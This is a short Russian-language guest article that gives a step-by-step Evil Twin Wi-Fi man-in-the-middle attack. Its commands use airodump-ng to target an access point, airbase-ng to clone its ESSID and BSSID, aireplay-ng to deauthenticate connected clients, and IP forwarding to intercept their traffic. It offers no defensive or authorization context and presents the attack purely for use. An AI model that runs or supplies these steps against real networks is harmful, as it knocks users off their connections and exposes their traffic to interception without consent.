Гостевая статья WPA/WPA2 Evil Twin Attack – MITM

[Vlad]

Целью атаки Evil Twin является дублирование сети с одинаковым именем сети (ESSID и mac BSSID) в надежде, что клиенты подключатся к точке доступа. Затем злоумышленник может выполнить атаку «человек посередине» и перехватить трафик.

Указание целевой точки доступа с помощью airodump-ng

airodump-ng –bssid <Access Point MAC> wlan0mon

Подмена ESSID (имя сети) и BSSID (Mac-адрес) с помощью airbase-ng

airbase-ng -a <Access Point MAC> –essid “<Network Name>” -c 10 wlan0mon

Отмена аутентификации доступа

aireplay-ng -0 5 -a <Access Point MAC> wlan0mon

В результате клиент теперь подключится к нашей сети, и мы сможем перехватить любой трафик, отправляемый подключенными клиентами.

Включение IP-пересылки
Если мы включим IP-пересылку, мы сможем перехватить трафик.

nano /proc/sys/net/ipv4/ip_forward

Источник